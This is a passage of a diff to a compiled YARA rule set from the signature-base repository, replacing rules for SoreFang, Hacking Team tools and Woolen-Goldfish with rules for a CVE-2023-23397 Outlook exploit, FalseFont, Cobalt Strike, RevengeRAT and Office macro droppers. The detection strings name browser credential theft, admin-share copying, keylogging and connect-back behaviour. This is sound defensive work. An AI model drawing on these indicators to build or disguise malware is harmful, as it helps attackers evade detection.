+		$u2 = { 00 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 3? 3?|3? 3?|3?) }
+		$fp_msi1 = {84 10 0C 00 00 00 00 00 C0 00 00 00 00 00 00 46}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		( uint16( 0 ) == 0xCFD0 and 1 of ( $psetid* ) or uint32be( 0 ) == 0x789F3E22 ) and any of ( $u* ) and $rfp and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Modify_Alphabet_Custom_Encode : FILE
+rule SIGNATURE_BASE_EXPL_SUSP_Outlook_CVE_2023_23397_SMTP_Mail_Mar23 : CVE_2023_23397
 {
 	meta:
-		description = "Rule to detect SoreFang based on arguments passed into custom encoding algorithm function"
-		author = "NCSC"
-		id = "7c5c1be0-ccad-5c8f-a026-445994b1f279"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L231-L243"
+		description = "Detects suspicious *.eml files that include TNEF content that possibly exploits CVE-2023-23397. Lower score than EXPL_SUSP_Outlook_CVE_2023_23397_Exfil_IP_Mar23 as we're only looking for UNC prefix."
+		author = "Nils Kuhnert"
+		id = "922fae73-520d-5659-8331-f242c7c55810"
+		date = "2023-03-17"
+		modified = "2023-03-24"
+		reference = "https://twitter.com/wdormann/status/1636491612686622723"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_outlook_cve_2023_23397.yar#L83-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "f0f5bcad52b0b15dc74a51973ef2752234bd12d677c846b2f96fe569d906ea3b"
-		score = 75
+		logic_hash = "a361eb3abf98655f43efff2a5399f112d9ac2d23df85a642ab744c78e98330e0"
+		score = 60
 		quality = 85
-		tags = "FILE"
+		tags = "CVE-2023-23397"
 
 	strings:
-		$ = { 33 C0 8B CE 6A 36 6A 71 66 89 46 60 88 46 62 89 46 68 66 89 46
-            64 }
+		$mail1 = { 0A 46 72 6F 6D 3A 20 }
+		$mail2 = { 0A 54 6F 3A }
+		$mail3 = { 0A 52 65 63 65 69 76 65 64 3A }
+		$tnef1 = "Content-Type: application/ms-tnef" ascii
+		$tnef2 = "\x78\x9f\x3e\x22" base64
+		$ipm1 = "IPM.Task" base64
+		$ipm2 = "IPM.Appointment" base64
+		$unc = "\x00\x00\x00\x5c\x5c" base64
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		all of ( $mail* ) and all of ( $tnef* ) and 1 of ( $ipm* ) and $unc
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Custom_Encode_Decode : FILE
+rule SIGNATURE_BASE_Malware_JS_Powershell_Obfuscated : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on the custom encoding/decoding algorithm function"
-		author = "NCSC"
-		id = "4885a659-bb3a-5e33-99cc-b827931bf58f"
-		date = "2023-12-05"
+		description = "Unspecified malware - file rechnung_3.js"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7995dd3a-5942-5c48-9e50-64f4964249a7"
+		date = "2017-03-24"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L245-L274"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_javascript_powershell.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "536147bda9603d68748010f9db260af732fe0865a601ae1104538933b19c519b"
+		logic_hash = "1dd745624971f10acb7911433f363b0cf20c8c45344f702d7f3549c58689b371"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3af15a2d60f946e0c4338c84bd39880652f676dc884057a96a10d7f802215760"
 
 	strings:
-		$ = { 55 8B EC 8B D1 53 56 8B 75 08 8B DE 80 42 62 FA 8A 4A 62 66 D3
-            EB 57 3A 5A 5C 74 0F}
-		$ = { 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE C1 88 4A 62 8A
-            4A 62 B8 01 00 00 00}
-		$ = { 8A 46 62 84 C0 74 3E 3C 06 73 12 0F B6 C0 B9 06 00 00 00 2B C8
-            C6 46 62 06 66 D3 66 60 0F B7 4E 60}
-		$ = { 80 3C 38 0D 0F 84 93 01 00 00 C6 42 62 06 8B 56 14 83 FA 10 72
-            04 8B 06}
-		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5B 3B C8 75 07 8B 55 EC B3 3E}
-		$ = { 0F BE 0C 38 8B 45 EC 0F B6 40 5E 3B C8 75 0B 8B 55 EC D0 EB C6
-            42 62 05}
-		$ = { 8B 55 EC 0F BE 04 38 0F B6 DB 0F B6 4A 5F 3B C1 B8 3F 00 00 00
-            0F 44 D8}
-		$ = { 8A 4A 62 66 8B 52 60 66 D3 E2 0F B6 C3 66 0B D0 8B 45 EC 66 89
-            50 60 8A 45 F3 02 C1 88 45 F3 3C 08 72 2E 04 F8 8A C8 88 45 F3
-            66 D3 EA 8B 4D 08 0F B6 C2 50 }
-		$ = { 3A 5A 5C 74 0F 3A 5A 5D 74 0A 3A 5A 58 74 05 3A 5A 59 75 05 FE
-            C1 88 4A 62 }
+		$x1 = "po\" + \"wer\" + \"sh\" + \"e\" + \"ll\";" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and any of them
+		filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Remove_Chars_Comma_Space_Dot : FILE
+rule SIGNATURE_BASE_APT_MAL_Falsefont_Backdoor_Jan24 : FILE
 {
 	meta:
-		description = "Rule to detect SoreFang based on function that removes commas, spaces and dots"
-		author = "NCSC"
-		id = "c15779b0-6a5e-5345-94ad-95615b567f1f"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L276-L289"
+		description = "Detects FalseFont backdoor, related to Peach Sandstorm APT"
+		author = "X__Junior, Jonathan Peters"
+		id = "b6a3efff-2abf-5ac1-9a2b-c7b30b51f92c"
+		date = "2024-01-11"
+		modified = "2024-04-24"
+		reference = "https://twitter.com/MsftSecIntel/status/1737895710169628824"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_peach_sandstorm.yar#L1-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
-		logic_hash = "652607e0cfe6f5ad6ede169e28f63e8262fc37cbc7baa2525e52e79572d9a468"
-		score = 75
+		hash = "364275326bbfc4a3b89233dabdaf3230a3d149ab774678342a40644ad9f8d614"
+		logic_hash = "9a1b3779b63dd7fa8ddc84067dec09542518e9acebbf5d3b45cb75ec4add1158"
+		score = 80
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$ = {8A 18 80 FB 2C 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
-		$ = {8A 18 80 FB 2E 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
-		$ = {8A 18 80 FB 20 74 03 88 19 41 42 40 3B D6 75 F0 8B 5D 08}
+		$x1 = "Agent.Core.WPF.App" ascii
+		$x2 = "3EzuNZ0RN3h3oV7rzILktSHSaHk+5rtcWOr0mlA1CUA=" wide
+		$x3 = "viOIZ9cX59qDDjMHYsz1Yw==" wide
+		$sa1 = "StopSendScreen" wide
+		$sa2 = "Decryption failed :(" wide
+		$sb1 = "{0}     {1}     {2}     {3}" wide
+		$sb2 = "\\BraveSoftware\\Brave-Browser\\User Data\\" wide
+		$sb3 = "select * from logins" wide
+		$sb4 = "Loginvault.db" wide
+		$sb5 = "password_value" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $sa* ) or all of ( $sb* ) or ( 1 of ( $sa* ) and 4 of ( $sb* ) ) )
 }
-rule SIGNATURE_BASE_APT_APT29_Sorefang_Disk_Enumeration_Strings : FILE
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22
 {
 	meta:
-		description = "Rule to detect SoreFang based on disk enumeration strings"
-		author = "NCSC"
-		id = "0ff01793-6fb7-5cff-b4e4-6709269ab0f0"
-		date = "2023-12-05"
+		description = "Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated"
+		author = "CodeX"
+		id = "d396ab0e-b584-5a7c-8627-5f318a20f9dd"
+		date = "2022-07-04"
 		modified = "2023-12-05"
-		reference = "https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt29_grizzly_steppe.yar#L291-L310"
+		reference = "https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cobaltstrike.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
-		logic_hash = "4a225b767dc922625c333aea866638bc5e239137592e46c17563b9cc380b0eea"
-		score = 75
+		logic_hash = "233b3cb441f45f400c0261589aac31dd1fcd9c4e3a86a6aaa46c60849063b34b"
+		score = 80
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$ = "\x0D\x0AFree on disk: "
-		$ = "Total disk: "
-		$ = "Error in GetDiskFreeSpaceEx\x0D\x0A"
-		$ = "\x0D\x0AVolume label: "
-		$ = "Serial number: "
-		$ = "File system: "
-		$ = "Error in GetVolumeInformation\x0D\x0A"
-		$ = "I can not het information about this disk\x0D\x0A"
+		$sleep_mask = { 48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 45 33 DB 45 33 D2 33 FF 33 F6 48 8B E9 BB 03 00 00 00 85 D2 0F 84 81 00 00 00 0F B6 45 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and all of them
+		$sleep_mask
 }
-rule SIGNATURE_BASE_Bin_Ndisk : FILE
+rule SIGNATURE_BASE_Revengerat_Sep17 : FILE
 {
 	meta:
-		description = "Hacking Team Disclosure Sample - file ndisk.sys"
+		description = "Detects RevengeRAT malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f442315e-67c2-55a5-954e-8e7e48aa1243"
-		date = "2015-07-07"
-		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/a03a6ed90b89945a992a8c69f716ec3c743fa1d958426f4c50378cca5bef0a01/analysis/1436184181/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hackingteam_rules.yar#L10-L31"
+		id = "7e58af06-a0ce-532c-9483-b1eca5e3cc28"
+		date = "2017-09-04"
+		modified = "2020-07-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_revenge_rat.yar#L11-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cf5089752ba51ae827971272a5b761a4ab0acd84"
-		logic_hash = "d93147e9631065eab35cbbc4ce112cfef92f81063cf8570bc021fbfe72811ab6"
-		score = 100
+		logic_hash = "467133402d6898f325cfd8c18308fc2a4dafd06c8624f9347225f16afd4035ce"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a"
+		hash2 = "7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213"
+		hash3 = "fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967"
 
 	strings:
-		$s1 = "\\Registry\\Machine\\System\\ControlSet00%d\\services\\ndisk.sys" fullword wide
-		$s2 = "\\Registry\\Machine\\System\\ControlSet00%d\\Enum\\Root\\LEGACY_NDISK.SYS" fullword wide
-		$s3 = "\\Driver\\DeepFrz" wide
-		$s4 = "Microsoft Kernel Disk Manager" fullword wide
-		$s5 = "ndisk.sys" fullword wide
-		$s6 = "\\Device\\MSH4DEV1" wide
-		$s7 = "\\DosDevices\\MSH4DEV1" wide
-		$s8 = "built by: WinDDK" fullword wide
+		$x1 = "Nuclear Explosion.g.resources" fullword ascii
+		$x4 = "5B1EE7CAD3DFF220A95D1D6B91435D9E1520AC41" fullword ascii
+		$x5 = "\\RevengeRAT\\" ascii
+		$x6 = "Revenge-RAT client has been successfully installed." ascii
+		$x7 = "Nuclear Explosion.exe" fullword ascii
+		$x8 = " Revenge-RAT 201" wide
+		$s1 = "{11111-22222-20001-00001}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 30KB and 6 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_Hackingteam_Elevator_DLL : FILE
+rule SIGNATURE_BASE_Beepservice_Hacktool : FILE
 {
 	meta:
-		description = "Hacking Team Disclosure Sample - file elevator.dll"
+		description = "Detects BeepService Hacktool used by Chinese APT groups"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d479c675-b200-56e3-8976-f70b45ea791e"
-		date = "2015-07-07"
+		id = "8813a01a-10db-52e7-bb1e-322864e87b15"
+		date = "2016-05-12"
 		modified = "2023-12-05"
-		reference = "http://t.co/EG0qtVcKLh"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hackingteam_rules.yar#L33-L56"
+		reference = "https://goo.gl/p32Ozf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_beepservice.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b7ec5d36ca702cc9690ac7279fd4fea28d8bd060"
-		logic_hash = "f2860c0bb6176f7cc57cb703e9d4235c4cf0b9cc1c0e7c47fb4c8ba47155a616"
-		score = 70
+		logic_hash = "176136e8a5ffec258caebf8d6b452b556093c5998414a7c9a4451ad78482f862"
+		score = 85
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "032df812a68852b6f3822b9eac4435e531ca85bdaf3ee99c669134bd16e72820"
+		hash2 = "e30933fcfc9c2a7443ee2f23a3df837ca97ea5653da78f782e2884e5a7b734f7"
+		hash3 = "ebb9c4f7058e19b006450b8162910598be90428998df149977669e61a0b7b9ed"
+		hash4 = "6db2ffe7ec365058f9d3b48dcca509507c138f19ade1adb5f13cf43ea0623813"
 
 	strings:
-		$s1 = "\\sysnative\\CI.dll" ascii
-		$s2 = "setx TOR_CONTROL_PASSWORD" fullword ascii
-		$s3 = "mitmproxy0" fullword ascii
-		$s4 = "\\insert_cert.exe" ascii
-		$s5 = "elevator.dll" fullword ascii
-		$s6 = "CRTDLL.DLL" fullword ascii
-		$s7 = "fail adding cert" fullword ascii
-		$s8 = "DownloadingFile" fullword ascii
-		$s9 = "fail adding cert: %s" fullword ascii
-		$s10 = "InternetOpenA fail" fullword ascii
+		$x1 = "\\\\%s\\admin$\\system32\\%s" fullword ascii
+		$s1 = "123.exe" fullword ascii
+		$s2 = "regclean.exe" fullword ascii
+		$s3 = "192.168.88.69" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and $x1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Hackingteam_Elevator_EXE : FILE
+rule SIGNATURE_BASE_SUSP_Office_Dropper_Strings : FILE
 {
 	meta:
-		description = "Hacking Team Disclosure Sample - file elevator.exe"
+		description = "Detects Office droppers that include a notice to enable active content"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a68b68dd-372d-5572-a1e7-1b7e06e986d8"
-		date = "2015-07-07"
+		id = "6560fdf7-46e8-5c16-8263-a36f1dec7868"
+		date = "2018-09-13"
 		modified = "2023-12-05"
-		reference = "Hacking Team Disclosure elevator.c"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hackingteam_rules.yar#L58-L86"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9261693b67b6e379ad0e57598602712b8508998c0cb012ca23139212ae0009a1"
-		logic_hash = "58f3c28fa69da0329a4cd5451a86260056076a9d0094965e9c23a63ef72cfc98"
-		score = 70
-		quality = 81
+		logic_hash = "3a66a86eb99a3e7cd02e3444714c6c88b423cd0ea1e6210bf91da01cf804105f"
+		score = 65
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "40a10420b9d49f87527bc0396b19ec29e55e9109e80b52456891243791671c1c"
-		hash2 = "92aec56a859679917dffa44bd4ffeb5a8b2ee2894c689abbbcbe07842ec56b8d"
 
 	strings:
-		$x1 = "CRTDLL.DLL" fullword ascii
-		$x2 = "\\sysnative\\CI.dll" ascii
-		$x3 = "\\SystemRoot\\system32\\CI.dll" ascii
-		$x4 = "C:\\\\Windows\\\\Sysnative\\\\ntoskrnl.exe" fullword ascii
-		$s1 = "[*] traversing processes" fullword ascii
-		$s2 = "_getkprocess" fullword ascii
-		$s3 = "[*] LoaderConfig %p" fullword ascii
-		$s4 = "loader.obj" fullword ascii
-		$s5 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
-		$s6 = "[*] token restore" fullword ascii
-		$s7 = "elevator.obj" fullword ascii
-		$s8 = "_getexport" fullword ascii
+		$a1 = "_VBA_PROJECT" wide
+		$s1 = "click enable editing" fullword ascii
+		$s2 = "click enable content" fullword ascii
+		$s3 = "\"Enable Editing\"" fullword ascii
+		$s4 = "\"Enable Content\"" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of ( $x* ) and 3 of ( $s* )
+		uint16( 0 ) == 0xcfd0 and filesize < 500KB and $a1 and 1 of ( $s* )
 }
-rule SIGNATURE_BASE_Woolengoldfish_Sample_1
+rule SIGNATURE_BASE_SUSP_Enablecontent_String_Gen : FILE
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "Detects suspicious string that asks to enable active content in Office Doc"
 		author = "Florian Roth (Nextron Systems)"
-		id = "923de51a-8422-5318-95f5-79613d2d642e"
-		date = "2015-03-25"
+		id = "d763bc21-2925-55df-85e0-1ee857e921ca"
+		date = "2019-02-12"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L13-L28"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L19-L40"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
-		logic_hash = "9490715a2fc7d3c742771a8211bcfb4c0a0bafba4d5de8eee5825fdabaded6af"
-		score = 60
+		logic_hash = "cde995ab0486fdafdc98e36c28a1f786ee7485387158f7337acd5f7dd0e3fed1"
+		score = 65
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
 
 	strings:
-		$s1 = "Cannot execute (%d)" fullword ascii
-		$s16 = "SvcName" fullword ascii
+		$e1 = "Enable Editing" fullword ascii
+		$e2 = "Enable Content" fullword ascii
+		$e3 = "Enable editing" fullword ascii
+		$e4 = "Enable content" fullword ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xcfd0 and ( $e1 in ( 0 .. 3000 ) or $e2 in ( 0 .. 3000 ) or $e3 in ( 0 .. 3000 ) or $e4 in ( 0 .. 3000 ) or 2 of them )
 }
-rule SIGNATURE_BASE_Woolengoldfish_Generic_1
+rule SIGNATURE_BASE_SUSP_Worddoc_VBA_Macro_Strings : FILE
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "Detects suspicious strings in Word Doc that indcate malicious use of VBA macros"
 		author = "Florian Roth (Nextron Systems)"
-		id = "351f5ee5-c0ec-51b6-9953-2b64e3e74b09"
-		date = "2015-03-25"
+		id = "210baf6e-ec67-5bc4-ba27-6a6de0c11a73"
+		date = "2019-02-12"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L30-L60"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L42-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "79879be4f49c8830573eb4a9f958ef9060413ea8b5dd3f8f3d5816e146d3a0b7"
-		score = 90
+		logic_hash = "441e4a8e90d6045d0ad6a959ce56e834960c48083343add8e4f519f4b83bc82d"
+		score = 60
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
-		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
-		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
+		tags = "FILE"
+		hash1 = "525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de"
 
 	strings:
-		$x0 = "Users\\Wool3n.H4t\\"
-		$x1 = "C-CPP\\CWoolger"
-		$x2 = "NTSuser.exe" fullword wide
-		$s1 = "107.6.181.116" fullword wide
-		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
-		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
-		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
-		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
-		$s6 = "wlg.dat" fullword
-		$s7 = "woolger" fullword wide
-		$s8 = "[Enter]" fullword
-		$s9 = "[Control]" fullword
+		$a1 = "\\Microsoft Shared\\" ascii
+		$a2 = "\\VBA\\" ascii
+		$a3 = "Microsoft Office Word" fullword ascii
+		$a4 = "PROJECTwm" fullword wide
+		$s1 = "AppData" fullword ascii
+		$s2 = "Document_Open" fullword ascii
+		$s3 = "Project1" fullword ascii
+		$s4 = "CreateObject" fullword ascii
 
 	condition:
-		(1 of ( $x* ) and 2 of ( $s* ) ) or ( 6 of ( $s* ) )
+		uint16( 0 ) == 0xcfd0 and filesize < 800KB and all of them
 }
-rule SIGNATURE_BASE_Woolengoldfish_Generic_2
+rule SIGNATURE_BASE_SUSP_Officedoc_VBA_Base64Decode : FILE
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "Detects suspicious VBA code with Base64 decode functions"
 		author = "Florian Roth (Nextron Systems)"
-		id = "930b928f-ff32-56b2-9e3c-dd80036ff7ef"
-		date = "2015-03-25"
+		id = "99690116-fc89-53d7-8f29-575d75d53fc9"
+		date = "2019-06-21"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L62-L79"
+		reference = "https://github.com/cpaton/Scripting/blob/master/VBA/Base64.bas"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L65-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "25d2ea25543b0a6330e443333f1ac7a59874631c8ee7faeb4ea6d94c62c255fc"
-		score = 90
+		logic_hash = "1fb094c9991f93e9d1003832dc11a58efa8281e9fe844e61e27dfd077f55ad39"
+		score = 70
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
-		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
-		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
-		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
+		tags = "FILE"
+		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
 
 	strings:
-		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+		$s1 = "B64_CHAR_DICT" ascii
+		$s2 = "Base64Decode" ascii
+		$s3 = "Base64Encode" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xcfd0 and filesize < 60KB and 2 of them
 }
-rule SIGNATURE_BASE_Woolengoldfish_Generic_3
+rule SIGNATURE_BASE_SUSP_VBA_Filesystem_Access : FILE
 {
 	meta:
-		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		description = "Detects suspicious VBA that writes to disk and is activated on document open"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c227d24-624c-5fb5-a2ea-a971fda8bfba"
-		date = "2015-03-25"
+		id = "91241b91-ca3f-5817-bf78-550fe015b467"
+		date = "2019-06-21"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/NpJpVZ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_woolengoldfish.yar#L81-L111"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_susp_office_dropper.yar#L82-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ac51c25ad6ef6668238fef1de50517d48e6509f57cd6dd723595777ae16d8a6c"
-		score = 90
-		quality = 83
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
-		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
+		logic_hash = "13d7e0708968a7700308e6216ea5d0a396f9335137ae1e33c3b34a2f54012ec6"
+		score = 60
+		quality = 85
+		tags = "FILE"
+		hash1 = "52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc"
 
 	strings:
-		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
-		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
-		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
-		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
-		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
